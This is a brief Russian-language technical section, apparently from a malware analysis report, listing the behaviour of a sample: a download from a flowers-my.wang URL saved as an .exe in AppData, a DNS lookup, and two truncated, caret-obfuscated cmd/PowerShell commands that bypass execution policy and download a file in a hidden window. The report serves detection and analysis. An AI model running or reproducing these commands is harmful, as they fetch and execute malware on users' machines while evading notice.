Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OWer^s^h^E^lL.^E^XE -exeCu^tI^on^POLICY ^BY^pASS^ -^nopRo^fiL^e^ -WIn^d^oW^stYLe^ ^H^i^dDEN (n^EW^-^OB^JECT^ s^y^STE^M.^NEt.wEb^cLiEn^t).d^o^w^n^LoAd^fILE^(^'http://flowers-my....
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /c "p^OWer^s^h^E^lL.^E^XE -exeCu^tI^on^POLICY ^BY^pASS^ -^nopRo^fiL^e^ -WIn^d^oW^stYLe^ ^H^i^dDEN (n^EW^-^OB^JECT^ s^y^STE^M.^NEt.wEb^cLiEn^t).d^o^w^n^LoAd^fILE^(^'http://flowers-my....' (со скрытым окном)